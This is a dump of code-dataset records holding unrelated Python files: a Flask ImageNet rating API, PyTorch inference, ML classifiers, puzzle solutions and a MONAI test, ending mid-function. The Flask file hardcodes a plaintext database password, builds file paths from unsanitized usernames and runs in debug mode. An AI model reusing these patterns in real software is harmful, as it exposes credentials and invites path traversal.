1\n","sub_path":"tools/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"493161474","text":"#!/usr/bin/env python2\n# -*- coding: UTF-8 -*-\n\nimport flask\nimport databasehandler\nimport json\nimport time\nimport os\nimport io\nimport cv2\nimport random\nimport base64\nfrom flask import request,Response,render_template,jsonify\n\n\n#web api\napi_name = \"Imagenet Evaluation\"\nip_addr = \"192.168.0.116\"\nip_port = 8006\n\n\n#Database\n\ndatabase_ip = \"localhost\"\nusername = \"li\"\npasswd = \"issysesosakau\"\ndatabase_name = \"ImagenetDBT\"\nimage_table = \"ImageInfo\"\npreference_table = \"ImagePreference\"\nrelativity_table = \"ImageRelativity\"\ndescription_table = \"ImageDescription\"\nsynset_table = \"SynsetMap\"\ndb = databasehandler.DatabaseMySQL(database_ip,username,passwd,database_name)\nuser_info_columns = [\"UserName\",\"UserID\"]\nre = db.selectdistinct(preference_table,user_info_columns)\nuser_id_list = {}\nfor user in re:\n user_id_list[user[0]] = int(user[1])\nprint(user_id_list)\n\n#Variables\nstatus = \"test\"\ntranslator = googletrans.Translator()\n\n\n#Paths\nbase_path = \"/home/li/webapi/\"\nuser_path = base_path + \"user/\"\nbroken_image_list_path = \"/home/li/datasets/broken_list_id.txt\"\ntranslate_file_path = \"/home/li/datasets/imageinfo_wnid_translate.txt\"\n\n################## Translate\n\nchinese_dic = {}\njapanese_dic = {}\nwnid_list = []\nwith io.open(translate_file_path,'r',encoding='utf-8') as translate_f:\n for line in translate_f.readlines():\n line = line.strip('\\n')\n l_list = line.split('\\t')\n wnid = str(l_list[0])\n chinese = l_list[2]\n japanese = l_list[3]\n wnid_list.append(wnid)\n chinese_dic[wnid] = chinese\n japanese_dic[wnid] = japanese\n #print(chinese_dic[wnid])\n 
#print(japanese_dic[wnid])\n\n\n#print(wnid_list)\ncategory_num = len(wnid_list)\n\n##################\n\n#Functions\ndef get_random_image():\n random_category_index = random.randint(0,category_num - 1)\n condition_dic = {}\n condition_dic[\"Class0WNID\"] = wnid_list[random_category_index]\n columns = [\"ImageName\",\"IndexID\",\"Path\",\"Source\",\"Class0Name\",\"Class0WNID\"]\n re = db.selectrandom(image_table,columns = columns, condition_dic = condition_dic)\n return re\n\n\ndef update_image(username):\n current_user_path = user_path + str(username) + \"/\"\n eva_image_path = current_user_path + \"evaluate_image.jpg\"\n com_image_path = current_user_path + \"compare_image.jpg\"\n imageinfo_file_path = current_user_path + \"image_info.txt\"\n eva_image_dic = get_random_image()\n eva_image_file = eva_image_dic[\"Path\"] + eva_image_dic[\"ImageName\"] + \".jpg\"\n com_image_dic = get_random_image()\n com_image_file = com_image_dic[\"Path\"] + com_image_dic[\"ImageName\"] + \".jpg\"\n eva_image_id = int(eva_image_dic[\"IndexID\"])\n com_image_id = int(com_image_dic[\"IndexID\"])\n eva_image_name = eva_image_dic[\"Class0Name\"]\n eva_image_wnid = eva_image_dic[\"Class0WNID\"]\n com_image_name = com_image_dic[\"Class0Name\"]\n com_image_wnid = com_image_dic[\"Class0WNID\"]\n img_dic = {}\n img_dic[\"Evaluation ID\"] = eva_image_id\n img_dic[\"Compare ID\"] = com_image_id\n img_dic[\"Evaluation Name\"] = eva_image_name\n img_dic[\"Compare Name\"] = com_image_name\n imageinfo_file = open(imageinfo_file_path,'w')\n imageinfo_file.write(json.dumps(img_dic))\n imageinfo_file.close()\n\n eva_trans_ja = japanese_dic[str(eva_image_wnid)]\n eva_trans_ch = chinese_dic[str(eva_image_wnid)]\n com_trans_ja = japanese_dic[str(com_image_wnid)]\n com_trans_ch = chinese_dic[str(com_image_wnid)]\n \n eva_img = cv2.imread(eva_image_file)\n cv2.imwrite(eva_image_path,eva_img)\n com_img = cv2.imread(com_image_file)\n cv2.imwrite(com_image_path,com_img)\n with open(eva_image_path,'r') as eva_image_f:\n eva_image_stream = eva_image_f.read()\n eva_image_stream = base64.b64encode(eva_image_stream)\n with open(com_image_path,'r') as com_image_f:\n com_image_stream = com_image_f.read()\n com_image_stream = base64.b64encode(com_image_stream)\n return eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch\n \n \n\n\n\napp = flask.Flask(api_name)\n\n@app.route('/home', methods = ['GET','POST'])\ndef home():\n return render_template('imagenet_home_v2.html')\n\n\n@app.route('/login', methods = ['POST','GET'])\ndef login():\n username = request.form.get(\"username\")\n \n print(username)\n if username==None:\n return render_template('imagenet_home_v2.html')\n elif username==\"\":\n return render_template('imagenet_home_v2.html')\n\n username = str(username).lower()\n current_user_path = user_path + str(username) + \"/\"\n userinfo_file_path = current_user_path + \"info.txt\"\n userlog_file_path = current_user_path + \"log.txt\"\n\n \n if username in user_id_list.keys():\n userid = user_id_list[username]\n else:\n userid = len(user_id_list.keys())\n user_id_list[username] = int(userid)\n \n if os.path.exists(current_user_path):\n i = 1\n else:\n os.mkdir(current_user_path)\n userinfo_file = open(userinfo_file_path,'w')\n userinfo_dic = {}\n userinfo_dic[\"UserName\"] = username\n userinfo_dic[\"UserID\"] = int(userid)\n userinfo_file.write(json.dumps(userinfo_dic) + \"\\n\")\n userinfo_file.close()\n 
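# start an empty per-user log file here; the /log route below appends one JSON record per submitted answer, e.g. {'UserName': 'test', 'UserID': 0, ...} (illustrative values, matching the log_dic built in log())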
userlog_file = open(userlog_file_path,'w')\n userlog_file.close()\n\n eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch = update_image(username)\n return render_template(\"imagenet_eva_touch.html\",UserName = username,UserID = userid,\n EvaluationID = eva_image_id,CompareID = com_image_id,\n EvaImageStream = eva_image_stream, ComImageStream = com_image_stream,\n EvaluationName = eva_image_name,CompareName = com_image_name,\n EvaluationWNID = eva_image_wnid,CompareWNID = com_image_wnid,\n EvaluationTranslateJa = eva_trans_ja, EvaluationTranslateCh = eva_trans_ch,\n CompareTranslateJa = com_trans_ja, CompareTranslateCh = com_trans_ch)\n\n\n@app.route('/log', methods=['POST'])\ndef log():\n log_dic = {}\n username = request.form[\"UserName\"]\n userid = request.form[\"UserID\"]\n current_user_path = user_path + str(username) + \"/\"\n userinfo_file_path = current_user_path + \"info.txt\"\n userlog_file_path = current_user_path + \"log.txt\"\n eva_imageid = request.form[\"EvaluationID\"]\n com_imageid = request.form[\"CompareImageID\"]\n eva_imagewnid = request.form[\"EvaluationWNID\"]\n com_imagewnid = request.form[\"CompareWNID\"]\n describe = request.form[\"Description\"]\n preference_eva = request.form[\"Preference_Image_eva\"]\n preference_com = request.form[\"Preference_Image_com\"]\n known = \"yes\"\n if (username == \"test\"):\n status = \"test\"\n else:\n status = \"log\"\n \n relativity = request.form[\"Relativity\"]\n \n log_dic = {}\n log_dic[\"UserName\"] = str(username)\n log_dic[\"UserID\"] = str(userid)\n log_dic[\"ImageID\"] = str(eva_imageid)\n log_dic[\"ImageClassWNID\"] = str(eva_imagewnid)\n log_dic[\"Status\"] = str(status)\n log_dic[\"Preference\"] = str(preference_eva)\n db.insert(preference_table,log_dic)\n\n log_dic = {}\n log_dic[\"UserName\"] = str(username)\n log_dic[\"UserID\"] = str(userid)\n log_dic[\"ImageID\"] = str(com_imageid)\n log_dic[\"ImageClassWNID\"] = str(com_imagewnid)\n log_dic[\"Status\"] = str(status)\n log_dic[\"Preference\"] = str(preference_com)\n db.insert(preference_table,log_dic)\n\n log_dic = {}\n log_dic[\"UserName\"] = str(username)\n log_dic[\"UserID\"] = str(userid)\n log_dic[\"ImageID_1\"] = str(eva_imageid)\n log_dic[\"ImageID_2\"] = str(com_imageid)\n log_dic[\"ImageClassWNID_1\"] = str(eva_imagewnid)\n log_dic[\"ImageClassWNID_2\"] = str(com_imagewnid)\n log_dic[\"Status\"] = str(status)\n log_dic[\"Relativity\"] = str(relativity)\n db.insert(relativity_table,log_dic)\n\n if describe != \"NULL\":\n log_dic = {}\n log_dic[\"UserName\"] = str(username)\n log_dic[\"UserID\"] = str(userid)\n log_dic[\"ImageID\"] = str(com_imageid)\n log_dic[\"ImageClassWNID\"] = str(com_imagewnid)\n log_dic[\"Status\"] = str(status)\n log_dic[\"Description\"] = str(describe.encode(\"utf-8\"))\n db.insert(description_table,log_dic)\n \n \n if os.path.exists(userlog_file_path):\n with open(userlog_file_path,'a') as userlog_f:\n userlog_f.write(json.dumps(log_dic) + \"\\n\")\n else:\n with open(userlog_file_path,'w') as userlog_f:\n userlog_f.write(json.dumps(log_dic) + \"\\n\")\n \n \n \n eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch = update_image(username)\n return render_template(\"imagenet_eva_touch.html\",UserName = username,UserID = userid,\n EvaluationID = eva_image_id,CompareID = com_image_id,\n 
EvaImageStream = eva_image_stream, ComImageStream = com_image_stream,\n EvaluationName = eva_image_name,CompareName = com_image_name,\n EvaluationWNID = eva_image_wnid,CompareWNID = com_image_wnid,\n EvaluationTranslateJa = eva_trans_ja, EvaluationTranslateCh = eva_trans_ch,\n CompareTranslateJa = com_trans_ja, CompareTranslateCh = com_trans_ch)\n\n\n@app.route('/next', methods=['POST'])\ndef next_image():\n username = request.form[\"UserName\"]\n userid = request.form[\"UserID\"] \n eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch = update_image(username)\n return render_template(\"imagenet_eva_touch.html\",UserName = username,UserID = userid,\n EvaluationID = eva_image_id,CompareID = com_image_id,\n EvaImageStream = eva_image_stream, ComImageStream = com_image_stream,\n EvaluationName = eva_image_name,CompareName = com_image_name,\n EvaluationWNID = eva_image_wnid,CompareWNID = com_image_wnid,\n EvaluationTranslateJa = eva_trans_ja, EvaluationTranslateCh = eva_trans_ch,\n CompareTranslateJa = com_trans_ja, CompareTranslateCh = com_trans_ch)\n\n\n@app.route('/broken', methods=['POST'])\ndef broken():\n username = request.form[\"UserName\"]\n userid = request.form[\"UserID\"]\n broken_imageid = request.form[\"BrokenID\"]\n with open(broken_image_list_path,'a') as broken_f:\n broken_f.write(str(broken_imageid) + \"\\n\")\n \n eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch = update_image(username)\n return render_template(\"imagenet_eva_touch.html\",UserName = username,UserID = userid,\n EvaluationID = eva_image_id,CompareID = com_image_id,\n EvaImageStream = eva_image_stream, ComImageStream = com_image_stream,\n EvaluationName = eva_image_name,CompareName = com_image_name,\n EvaluationWNID = eva_image_wnid,CompareWNID = com_image_wnid,\n EvaluationTranslateJa = eva_trans_ja, EvaluationTranslateCh = eva_trans_ch,\n CompareTranslateJa = com_trans_ja, CompareTranslateCh = com_trans_ch)\n\n\n\nif __name__ == '__main__':\n try:\n app.run(debug = True,host = ip_addr, port = ip_port)\n \n finally:\n print(\"server close!\")\n db.close()\n","sub_path":"imagenet_webapi_log_v2.py","file_name":"imagenet_webapi_log_v2.py","file_ext":"py","file_size_in_byte":11900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215381064","text":"#!python3\nimport torch\nimport cv2\nfrom PIL import Image\nimport torchvision.transforms as transforms\nimport numpy as np\nfrom Model_Class_From_the_Scratch import MODEL_From_Scratch\nfrom Model_Class_Transfer_Learning_MobileNet import MobileNet\nimport argparse\n\nclass Inference_Class():\n def __init__(self):\n USE_CUDA = torch.cuda.is_available()\n self.DEVICE = torch.device(\"cuda\" if USE_CUDA else \"cpu\")\n self.model = None\n self.label_map = None\n self.transform_info = transforms.Compose([\n transforms.Resize(size=(224, 224)),\n transforms.ToTensor()\n ])\n\n def load_model(self, is_train_from_scratch, label_map_file = \"label_map.txt\"):\n self.label_map = np.loadtxt(label_map_file, str, delimiter='\\t')\n num_classes = len(self.label_map)\n model_str = None\n if is_train_from_scratch:\n self.model = MODEL_From_Scratch(num_classes).to(self.DEVICE)\n model_str = \"PyTorch_Training_From_Scratch\"\n else:\n self.model = MobileNet(num_classes).to(self.DEVICE)\n 
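# note: a '.pt' suffix is appended below, so a matching checkpoint file (e.g. 'PyTorch_Transfer_Learning_MobileNet.pt' for this branch) must already exist on disk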
model_str = \"PyTorch_Transfer_Learning_MobileNet\"\n model_str += \".pt\"\n self.model.load_state_dict(torch.load(model_str, map_location=self.DEVICE))\n self.model.eval()\n\n def inference_video(self, video_source=\"test_video.mp4\"):\n cap = cv2.VideoCapture(video_source)\n if cap.isOpened():\n print(\"Video Opened\")\n else:\n print(\"Video Not Opened\")\n print(\"Program Abort\")\n exit()\n cv2.namedWindow(\"Input\", cv2.WINDOW_GUI_EXPANDED)\n cv2.namedWindow(\"Output\", cv2.WINDOW_GUI_EXPANDED)\n with torch.no_grad():\n while cap.isOpened():\n ret, frame = cap.read()\n if ret:\n output = self.inference_frame(frame)\n cv2.imshow(\"Input\", frame)\n cv2.imshow(\"Output\", output)\n else:\n break\n if cv2.waitKey(33) & 0xFF == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n return\n\n def inference_frame(self, opencv_frame):\n opencv_rgb = cv2.cvtColor(opencv_frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(opencv_rgb)\n image_tensor = self.transform_info(image)\n image_tensor.unsqueeze(0)\n image_tensor = image_tensor.to(self.DEVICE)\n\n inference_result = self.model(image_tensor)\n\n inference_result = inference_result.squeeze()\n inference_result = inference_result.cpu().numpy()\n result_frame = np.copy(opencv_frame)\n label_text = self.label_map[np.argmax(inference_result)]\n label_text += \" \" + str(inference_result[np.argmax(inference_result)])\n result_frame = cv2.putText(result_frame, label_text, (10, 50), cv2.FONT_HERSHEY_PLAIN, fontScale=2.0, color=(0,0,255), thickness=3)\n return result_frame\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--is_scratch\", \n required=False,\n action=\"store_true\", \n help=\"inference with model trained from the scratch\")\n parser.add_argument(\"-src\", \"--source\", \n required=False,\n type=str, \n default=\"./test_video.mp4\", \n help=\"OpenCV Video source\")\n\n args = parser.parse_args()\n is_train_from_scratch = False\n source = args.source\n\n if args.is_scratch:\n is_train_from_scratch = True\n if source.isdigit():\n source = int(source)\n\n inferenceClass = Inference_Class()\n inferenceClass.load_model(is_train_from_scratch)\n inferenceClass.inference_video(source)","sub_path":"Inference_Cam.py","file_name":"Inference_Cam.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"36808107","text":"#!/usr/bin/env python\n\"\"\"Treadmill setup.py.\"\"\"\n\n# pip 10.0 moved req to _internal. 
A better solution is needed; changed\n# for now so that the build passes.\ntry:\n    import pip.req as pip_req\nexcept ImportError:\n    import pip._internal.req as pip_req\n\n\ndef _read_requires(filename):\n    reqs = []\n    for inst_req in pip_req.parse_requirements(filename, session='no session'):\n        req = str(inst_req.req)\n        if req == 'kazoo[sasl]':\n            inst_req.req = 'kazoo==2.4.0.dev0'\n\n        if not inst_req.match_markers():\n            print('Skipping %r: %r => False' % (req, inst_req.markers))\n            continue\n        reqs.append(str(inst_req.req))\n    return reqs\n\n\nfrom setuptools import setup  # pylint: disable=wrong-import-position\n\n\nsetup(\n    version='3.7',\n    install_requires=_read_requires('requirements.txt'),\n    setup_requires=_read_requires('test-requirements.txt')\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"37598215","text":"import sys\nimport math\n\n# The while loop represents the game.\n# Each iteration represents a turn of the game\n# where you are given inputs (the heights of the mountains)\n# and where you have to print an output (the index of the mountain to fire on)\n# The inputs you are given are automatically updated according to your last actions.\n\ndic = {}\n\n# game loop\nwhile True:\n    for i in range(8):\n        mountain_h = int(input()) # represents the height of one mountain.\n        dic[i] = mountain_h\n    dic2 = dic.items()\n    montri = sorted(dic2, key=lambda x: x[1], reverse = True)\n    print (montri[0][0])\n\n##################################################################### DEBUG\n    print(\"Debug messages...\", file=sys.stderr)\n    print (dic, file = sys.stderr)\n    print (montri, file = sys.stderr)\n\n# Write an action using print\n# To debug: print(\"Debug messages...\", file=sys.stderr)\n# The index of the mountain to fire on.\n\n\n\n","sub_path":"the-descent.py","file_name":"the-descent.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"355087316","text":"# An OX-quiz result string such as \"OOXXOXXOOO\" is given. 
O means the problem was answered correctly, and X means it was answered incorrectly.\n# For a correct answer, the score of that problem is the number of consecutive O's up to and including it.\n# For example, the score of problem 10 is 3.\n# The score of \"OOXXOXXOOO\" is 1+2+0+0+1+0+0+1+2+3=10 points.\n# Given the result of an OX quiz, write a program that computes its score.\nn = int(input()) # number of test cases\n\n\nfor i in range(n): # repeat once per test case\n    score = 0\n    count = 0 # counts the current run of consecutive O's\n    a = input()\n\n    for j in a:\n        if j == 'O': # the answer was 'O'\n            count += 1 # an 'O' appeared, so extend the run: count + 1\n            score += count # add the run length to the score\n        elif j == 'X': # the answer was 'X'\n            count = 0 # reset count to 0\n\n    print(score)","sub_path":"18_배연주/session03/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"646608788","text":"from difflib import SequenceMatcher\nfrom string import punctuation, digits\n\npath_frami = \"../../data/resources/de_DE_frami.dic\"\n\namount_types = [\n    'g', 'kg', 'lb', 'ml', 'l', 'cups', 'cup', 'el', 'tl', 'ml', 'tbsp', 'tsp', 'msp', 'msp.', 'messerspitze', 'stiele',\n    'stiel', 'zweige', 'zweig', 'dosen', 'dose', 'blatt', 'blätter', 'bund', 'cl', 'scheibe', 'scheiben', 'glas',\n    'gläser', 'spritzer', 'stangen', 'prise', 'beutel', 'becher', 'tropfen', 'pk.', 'paket', 'pakete', 'würfel'\n]\n\n\ndef compare_ingredients_with_frami_dict(path_all_ingredients, tagger):\n    frami_dict = load_frami_dict_file()\n    found_words = []\n\n    with open(path_all_ingredients, 'r', encoding='utf-8') as f:\n        lines = f.readlines()\n\n    for line in lines:\n        formatted_ingredient = format_ingredient_line(line)\n        tagged_ingredient = tagger.tag_sent(formatted_ingredient)\n\n        for element in tagged_ingredient:\n            found_word = get_base_form_of_word(element, frami_dict)\n\n            if found_word is not None and len(found_word) > 0 and found_word not in found_words:\n                found_words.append(found_word)\n\n    return found_words\n\n\ndef load_frami_dict_file():\n    out = dict()\n    with open(path_frami, 'r') as f:\n        lines = f.readlines()\n\n    for line in lines[18:]:\n        line = line.replace('\\\\n', '').split('/')\n\n        if line[0][0] not in out:\n            out[line[0][0]] = dict()\n\n        if len(line) == 1:\n            out[line[0][0]][line[0]] = \"\"\n        else:\n            out[line[0][0]][line[0]] = line[1]\n\n    return out\n\n\ndef get_most_similar_word_from_frami_dict(word_to_check, frami_dict):\n    words_with_same_starting_letter = frami_dict[word_to_check[0]].keys()\n    best_score = 0\n    most_similar_word = \"\"\n    for word in words_with_same_starting_letter:\n        score = SequenceMatcher(None, word_to_check, word).ratio()\n\n        if score > best_score:\n            best_score = score\n            most_similar_word = word\n\n    return most_similar_word\n\n\ndef get_base_form_of_word(tagged_word, frami_dict):\n    if tagged_word[0][0] not in frami_dict:\n        return \"\"\n\n    if tagged_word[0] not in frami_dict[tagged_word[0][0]]:\n        \"\"\"\n        if tagged_word[0] not in similarity_ingredient_dict:\n            return get_most_similar_word_from_frami_dict(tagged_word[0], frami_dict)\n        else:\n            return tagged_word[0]\n        \"\"\"\n        pass\n    else:\n        return tagged_word[0]\n\n\ndef format_ingredient_line(ingredient):\n    formatted_ingredient = ingredient.rstrip('\\\\n')\n    formatted_ingredient = formatted_ingredient.translate(ingredient.maketrans('', '', punctuation))\n    formatted_ingredient = formatted_ingredient.translate(formatted_ingredient.maketrans('', '', digits))\n    formatted_ingredient = remove_amount_types(formatted_ingredient)\n\n    return formatted_ingredient\n\n\ndef remove_amount_types(ingr):\n    formatted_input = ingr.replace(u'\\\\xa0', u' ').split(' ')\n    out = []\n    for element_in_formatted_input in formatted_input:\n        if element_in_formatted_input.lower() in 
amount_types:\n continue\n\n if element_in_formatted_input == ' ':\n continue\n\n if 'à' in element_in_formatted_input:\n continue\n\n if len(element_in_formatted_input) == 0:\n continue\n\n out.append(element_in_formatted_input)\n return out\n","sub_path":"src/_old_code/parsing/parsing_with_frami_dict.py","file_name":"parsing_with_frami_dict.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"150171635","text":"from sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_selection import mutual_info_classif\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import model_selection\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.utils import shuffle\nfrom sklearn import metrics\nfrom sklearn import preprocessing\nimport pandas as pd\nimport numpy as np\n\npd.options.mode.chained_assignment = None\n\n\n#neigh = KNeighborsClassifier(n_neighbors=3)\ndataSet = pd.read_csv(\"/home/maryam/Documents/AI/CA4/data.csv\")\ndataSetPositive = dataSet[(dataSet[[\"Total Quantity\", \"Total Price\", \"Purchase Count\"]] > 0).all(1)]\ndataSetPositive[\"Date\"] = pd.to_datetime(dataSetPositive[\"Date\"])\ndataSetPositive['month'] = dataSetPositive['Date'].dt.month\ndataSetPositive[\"Day\"] = dataSetPositive[\"Date\"].dt.dayofweek\n#dataSetPositive[\"is_weakend\"] = np.where(dataSetPositive[\"Date\"].dt.dayofweek.isin([5, 6]), 1, 0)\n#d = pd.get_dummies(dataSetPositive['Country'])\n#dataSetPositive = dataSetPositive.join(d)\ntarget = dataSetPositive['Is Back'].map({'Yes': 1, 'No': 0})\ndataSetPositive = dataSetPositive.apply(LabelEncoder().fit_transform)\nfeatureNames = list(dataSetPositive.columns)\nfeatureNames.remove('Unnamed: 0')\nfeatureNames.remove('Customer ID')\n#featureNames.remove('Country')\nfeatureNames.remove('Date')\nfeatureNames.remove('Is Back')\nscalesFeatureNames = ['Total Quantity', 'Total Price', 'Purchase Count', 'Country']\nscaledFeatures = dataSetPositive[featureNames].copy()\nfeaturesValues = scaledFeatures[scalesFeatureNames]\nmin_max_scaler = preprocessing.MinMaxScaler(feature_range =(0, 1))\nscaler = min_max_scaler.fit(featuresValues.values)\nfeaturesValues = scaler.transform(featuresValues.values)\nscaledFeatures[scalesFeatureNames] = featuresValues\ntrainData, testData, trainTargets, testTargets = train_test_split(scaledFeatures, target, test_size = 0.2, random_state = 10) # 70% training and 30% test\nKNNClassifier = KNeighborsClassifier(n_neighbors = 49)#, weights = 'distance', p =2, n_jobs = -1)\nbaggibgClassifier = BaggingClassifier(base_estimator=KNNClassifier, n_estimators=15, max_samples = 0.5,\n max_features = 0.5, bootstrap=True, bootstrap_features=False, oob_score=False, warm_start=False, n_jobs=None, random_state=11, verbose=0)\n\nbaggibgClassifier = baggibgClassifier.fit(trainData, trainTargets)\npredictedTargets = baggibgClassifier.predict(testData)\n\nprecisionIsBack = metrics.precision_score(testTargets, predictedTargets, pos_label=1)\nprecisionIsNBack = metrics.precision_score(testTargets, predictedTargets, pos_label=0)\nrecallIsBack = metrics.recall_score(testTargets, predictedTargets, pos_label=1)\nrecallIsNBack = metrics.recall_score(testTargets, predictedTargets, 
pos_label=0)\n\nprint(\"Is Back\")\nprint(\"Accuracy: \", metrics.accuracy_score(testTargets, predictedTargets) * 100)\nprint(\"Precision: \", precisionIsBack * 100)\nprint(\"Recall: \", recallIsBack * 100)\nprint(\"Is Not Back\")\nprint(\"Accuracy: \", metrics.accuracy_score(testTargets, predictedTargets) * 100)\nprint(\"Precision: \", precisionIsNBack * 100)\nprint(\"Recall: \", recallIsNBack * 100)\nWsBack = len(testTargets[testTargets == 1])\nWsNBack = len(testTargets[testTargets == 0])\nprint(\"CHECK:\")\nprint(\"Average Precision: \", ((WsBack * precisionIsBack) + (WsNBack * precisionIsNBack)) / (WsBack + WsNBack) * 100)\nprint(\"Average Recall: \", ((WsBack * recallIsBack) + (WsNBack * recallIsNBack)) / (WsBack + WsNBack) * 100) ","sub_path":"BaggingKNN.py","file_name":"BaggingKNN.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"280937239","text":"class Solution:\n    def isAnagram(self, s: str, t: str) -> bool:\n        if(len(s) != len(t)):\n            return False\n        \n        dic1 = [0]*26\n        for i in range(len(s)):\n            dic1[ord(s[i])-ord('a')] += 1\n            dic1[ord(t[i])-ord('a')] -= 1\n        for num in dic1:\n            if num != 0:\n                return False\n        return True","sub_path":"Week_02/valid-anagram-2.py","file_name":"valid-anagram-2.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435941042","text":"# Copyright (c) MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import annotations\n\nimport unittest\n\nimport numpy as np\nimport torch\nfrom parameterized import parameterized\n\nfrom monai.transforms import MeanEnsemble\nfrom tests.utils import TEST_NDARRAYS, assert_allclose\n\nTESTS = []\nfor p in TEST_NDARRAYS:\n    TESTS.append([{\"weights\": None}, [p(torch.ones(2, 2, 2)), p(torch.ones(2, 2, 2)) + 2], p(torch.ones(2, 2, 2)) + 1])\n\n    TESTS.append(\n        [{\"weights\": None}, p(torch.stack([torch.ones(2, 2, 2), torch.ones(2, 2, 2) + 2])), p(torch.ones(2, 2, 2)) + 1]\n    )\n\n    TESTS.append(\n        [{\"weights\": [1, 3]}, [p(torch.ones(2, 2, 2)), p(torch.ones(2, 2, 2)) + 2], p(torch.ones(2, 2, 2)) * 2.5]\n    )\n\n    TESTS.append(\n        [\n            {\"weights\": [[1, 3], [3, 1]]},\n            [p(torch.ones(2, 2, 2)), p(torch.ones(2, 2, 2)) + 2],\n            p(torch.ones(2, 2, 2) * torch.tensor([2.5, 1.5]).reshape(2, 1, 1)),\n        ]\n    )\n\n    TESTS.append(\n        [\n            {\"weights\": np.array([[1, 3], [3, 1]])},\n            [p(torch.ones(2, 2, 2)), p(torch.ones(2, 2, 2)) + 2],\n            p(torch.ones(2, 2, 2) * torch.tensor([2.5, 1.5]).reshape(2, 1, 1)),\n        ]\n    )\n\n    TESTS.append(\n        [\n            {\"weights\": torch.tensor([[[1, 3]], [[3, 1]]])},\n            [p(torch.ones(2, 2, 2, 2)), p(torch.ones(2, 2, 2, 2)) + 2],\n            p(torch.ones(2, 2, 2, 2) * torch.tensor([2.5, 1.5]).reshape(1, 2, 1, 1)),\n        ]\n    )\n\n\nclass TestMeanEnsemble(unittest.TestCase):\n    @parameterized.expand(TESTS)\n    def test_value(self, input_param, img, expected_value):\n        result = MeanEnsemble(**input_param)(img)\n        assert_allclose(result, 
expected_value)\n\n    def test_cuda_value(self):\n        img = torch.stack([torch.ones(2, 2, 2, 2), torch.ones(2, 2, 2, 2) + 2])\n        expected_value = torch.ones(2, 2, 2, 2) * torch.tensor([2.5, 1.5]).reshape(1, 2, 1, 1)\n        if torch.cuda.is_available():\n            img = img.to(torch.device(\"cuda:0\"))\n            expected_value = expected_value.to(torch.device(\"cuda:0\"))\n        result = MeanEnsemble(torch.tensor([[[1, 3]], [[3, 1]]]))(img)\n        assert_allclose(result, expected_value)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"tests/test_mean_ensemble.py","file_name":"test_mean_ensemble.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"523465956","text":"# Write a python method that takes a dictionary of school courses and the students enrolled\n#    in each course and returns a dictionary of students with the courses they are enrolled\n#    in, sorted alphabetically.\n\n#     Example input: {'classA': ['student1', 'student2'], 'classB': ['student2']}\n#     Example output: {'student1': ['classA'], 'student2': ['classA', 'classB']}\n\nclassRoster = {'classA': ['dave', 'ashley', 'ben', 'tom'], 'classB': ['dave', 'ashley', 'zed', 'humphrey']}\n\ndef displayStudentSchedule(classRoster):\n    students = []\n    result = {}\n\n    # Grab every unique student and add them to a list of students\n    # This is so we can sort them before adding them each as a dictionary key\n    for course, studentArray in classRoster.items():\n        for student in studentArray:\n            if student not in students:\n                students.append(student)\n\n    students.sort()\n\n    # Add each student as a dict key (will already be sorted, as mentioned above)\n    for student in students:\n        result[student] = []\n\n    # Iterate through each course's list of students\n    # Add each course to the student's value (a list) stored in result\n    for course in classRoster:\n        for student in classRoster[course]:\n            